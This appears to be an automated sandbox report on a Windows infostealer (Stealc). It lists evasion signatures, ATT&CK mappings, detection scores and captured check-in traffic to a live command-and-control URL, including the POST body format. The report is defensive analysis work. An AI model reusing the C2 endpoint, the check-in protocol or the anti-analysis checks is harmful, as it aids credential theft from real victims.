Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C8DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C8D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C716A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C716B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C91BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess
Source: file.exe, file.exe, 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000002.00000002.1375818515.00000000017C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH~
Source: file.exe, 00000002.00000002.1375818515.00000000017F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareV
Source: file.exe, 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_2-25886)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_2-25877)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_2-25731)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_2-25750)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_2-25898)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C74A60 VirtualProtect 00000000,00000004,00000100,?
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C96390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C96390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C92AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7044, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C946A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C94610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: CProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C92D60 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C92B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C92A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C92C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1375818515.000000000179D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1278149370.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7044, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1375818515.000000000179D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1278149370.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7044, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (listed per tactic; a number in parentheses is the count of signatures matched for that technique, techniques without a number had no match)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (13); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Create Account (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection (submitted file)

Source   | Detection | Scanner        | Label
file.exe | 45%       | ReversingLabs  | Win32.Trojan.Generic
file.exe | 54%       | Virustotal     |
file.exe | 100%      | Avira          | TR/Crypt.TPM.Gen
file.exe | 100%      | Joe Sandbox ML |

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
Antivirus detection (URLs)

Source                                          | Detection | Scanner         | Label
http://185.215.113.2062?                        | 0%        | Avira URL Cloud | safe
http://185.215.113.206/c4becf79229cb002.php/F   | 100%      | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php/F   | 19%       | Virustotal      |

No contacted domains info
Contacted URLs

Name                                          | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php   | false     |                     | high
http://185.215.113.206/                       | false     |                     | high

URLs from memory and binaries

Name                                          | Source                                                                                        | Malicious | Antivirus Detection                             | Reputation
http://185.215.113.206/c4becf79229cb002.phpl  | file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | false     |                                                 | high
http://185.215.113.206/c4becf79229cb002.php/F | file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | false     | 19%, Virustotal; Avira URL Cloud: malware       | unknown
http://185.215.113.206/c4becf79229cb002.php?  | file.exe, 00000002.00000002.1375818515.00000000017C4000.00000004.00000020.00020000.00000000.sdmp | false     |                                                 | high
http://185.215.113.206/c4becf79229cb002.php0  | file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | false     |                                                 | high
http://185.215.113.206/M                      | file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | false     |                                                 | high
http://185.215.113.206                        | file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmp | false     |                                                 | high
http://185.215.113.2062?                      | file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmp | false     | Avira URL Cloud: safe                           | unknown
http://185.215.113.206/c4becf79229cb002.phpD  | file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | false     |                                                 | high
Contacted IPs

IP              | Domain  | Country  | ASN    | ASN Name               | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1560648
                              Start date and time:2024-11-22 04:26:10 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 12s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:13
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 117
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              No simulations
Match: 185.215.113.206
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/68b591d6548ec281/sqlite3.dll
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                              No context
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | LummaC | 185.215.113.16
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.94336351253114
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'731'584 bytes
                              MD5:e26b7b214a9bcdada5b6a91ced4f99b3
                              SHA1:092b5406ba5d33ebd2f40fb8ccbd9e191fb3a845
                              SHA256:0fcf04a856f1a43c977d633e19138fe8736482425557a16ea02e7572d2d6d313
                              SHA512:83b4713584b23fc879f7b079bdaa43ea900fded8a2bec2d0cc1b505de7101d706826056dd0e0bbd521c1ca6fd29b33e8e8a7bd42ffbc423dec3f2f7328b9f502
                              SSDEEP:49152:Vo3Ip876qfaZ5auoQOwubB5QgwR5BPB44:C3N76iBbB5Q15D
                              TLSH:1C85330C7653F34BC39F4C340AAF5C4673DF68D275A5AAF10D925A32526306AB4BEC1A
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa64000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007FAE5883B37Ah
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16200 | 221664aef12d75aba278a99b6261d0eb | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x1ac | 0x200 | 521970f31b879e846510786ca04e27d3 | False | 0.58203125 | data | 4.543958829285356 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x28a000 | 0x200 | f4942b5267648fd2c5df6718a616d8ea | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yqttidiy | 0x4d6000 | 0x18d000 | 0x18cc00 | 9c778460257297348325a9aaba7958b8 | False | 0.9948113579080026 | data | 7.953903563847724 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gxgxfcij | 0x663000 | 0x1000 | 0x600 | 97a34929d6c889816d19352d895bf0ef | False | 0.5950520833333334 | data | 5.1421198073273136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x664000 | 0x3000 | 0x2200 | f84eb0596b6a43990f21370b69abd3ff | False | 0.046185661764705885 | DOS executable (COM) | 0.4540847547322878 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x662a54 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-22T04:27:16.663705+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49700 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 22, 2024 04:27:14.612890005 CET | 49700 | 80 | 192.168.2.7 | 185.215.113.206
Nov 22, 2024 04:27:14.732428074 CET | 80 | 49700 | 185.215.113.206 | 192.168.2.7
Nov 22, 2024 04:27:14.732568979 CET | 49700 | 80 | 192.168.2.7 | 185.215.113.206
Nov 22, 2024 04:27:14.733470917 CET | 49700 | 80 | 192.168.2.7 | 185.215.113.206
Nov 22, 2024 04:27:14.852879047 CET | 80 | 49700 | 185.215.113.206 | 192.168.2.7
Nov 22, 2024 04:27:16.118921041 CET | 80 | 49700 | 185.215.113.206 | 192.168.2.7
Nov 22, 2024 04:27:16.118999004 CET | 49700 | 80 | 192.168.2.7 | 185.215.113.206
Nov 22, 2024 04:27:16.183192968 CET | 49700 | 80 | 192.168.2.7 | 185.215.113.206
Nov 22, 2024 04:27:16.302637100 CET | 80 | 49700 | 185.215.113.206 | 192.168.2.7
Nov 22, 2024 04:27:16.663641930 CET | 80 | 49700 | 185.215.113.206 | 192.168.2.7
Nov 22, 2024 04:27:16.663705111 CET | 49700 | 80 | 192.168.2.7 | 185.215.113.206
Nov 22, 2024 04:27:21.651875019 CET | 80 | 49700 | 185.215.113.206 | 192.168.2.7
Nov 22, 2024 04:27:21.651979923 CET | 49700 | 80 | 192.168.2.7 | 185.215.113.206
Nov 22, 2024 04:27:21.693295002 CET | 49700 | 80 | 192.168.2.7 | 185.215.113.206
                              • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 185.215.113.206 | 80 | 7044 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 04:27:14.733470917 CET | 90 | OUT
GET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
Nov 22, 2024 04:27:16.118921041 CET | 203 | IN
HTTP/1.1 200 OK
                              Date: Fri, 22 Nov 2024 03:27:15 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
Nov 22, 2024 04:27:16.183192968 CET | 413 | OUT
POST /c4becf79229cb002.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK
                              Host: 185.215.113.206
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
Data Ascii (multipart body, CRLF line breaks restored from the raw bytes):
------HDAAAAFIIJDBGDGCGDAK
Content-Disposition: form-data; name="hwid"

7CCC9870677F2148772887
------HDAAAAFIIJDBGDGCGDAK
Content-Disposition: form-data; name="build"

mars
------HDAAAAFIIJDBGDGCGDAK--
Nov 22, 2024 04:27:16.663641930 CET | 210 | IN
HTTP/1.1 200 OK
                              Date: Fri, 22 Nov 2024 03:27:16 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 decodes to "block")
                              Target ID:2
                              Start time:22:27:08
                              Start date:21/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xc70000
                              File size:1'731'584 bytes
                              MD5 hash:E26B7B214A9BCDADA5B6A91CED4F99B3
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1375818515.000000000179D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000003.1278149370.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true
                                Execution Graph

                                Execution Coverage:5%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:16.3%
                                Total number of Nodes:1364
                                Total number of Limit Nodes:28
26099->26102 26102->25777 26104 c9182e 26103->26104 26105 c91849 lstrcpy 26104->26105 26106 c91855 lstrlen 26104->26106 26105->26106 26107 c91873 26106->26107 26108 c91885 lstrcpy lstrcat 26107->26108 26109 c91898 26107->26109 26108->26109 26110 c918c7 26109->26110 26111 c918bf lstrcpy 26109->26111 26112 c918ce lstrlen 26110->26112 26111->26110 26113 c918e6 26112->26113 26114 c918f2 lstrcpy lstrcat 26113->26114 26115 c91906 26113->26115 26114->26115 26116 c91935 26115->26116 26117 c9192d lstrcpy 26115->26117 26118 c9193c lstrlen 26116->26118 26117->26116 26119 c91958 26118->26119 26120 c9196a lstrcpy lstrcat 26119->26120 26121 c9197d 26119->26121 26120->26121 26122 c919ac 26121->26122 26123 c919a4 lstrcpy 26121->26123 26124 c919b3 lstrlen 26122->26124 26123->26122 26125 c919cb 26124->26125 26126 c919d7 lstrcpy lstrcat 26125->26126 26127 c919eb 26125->26127 26126->26127 26128 c91a1a 26127->26128 26129 c91a12 lstrcpy 26127->26129 26130 c91a21 lstrlen 26128->26130 26129->26128 26131 c91a3d 26130->26131 26132 c91a4f lstrcpy lstrcat 26131->26132 26133 c91a62 26131->26133 26132->26133 26134 c91a91 26133->26134 26135 c91a89 lstrcpy 26133->26135 26136 c91a98 lstrlen 26134->26136 26135->26134 26137 c91ab4 26136->26137 26138 c91ac6 lstrcpy lstrcat 26137->26138 26140 c91ad9 26137->26140 26138->26140 26139 c91b08 26139->25893 26140->26139 26141 c91b00 lstrcpy 26140->26141 26141->26139 26143 c72a24 SystemTimeToFileTime SystemTimeToFileTime 26142->26143 26143->25896 26143->25897 26145 c9157f 26144->26145 26146 c9159f lstrcpy 26145->26146 26147 c915a7 26145->26147 26146->26147 26148 c915d7 lstrcpy 26147->26148 26149 c915df 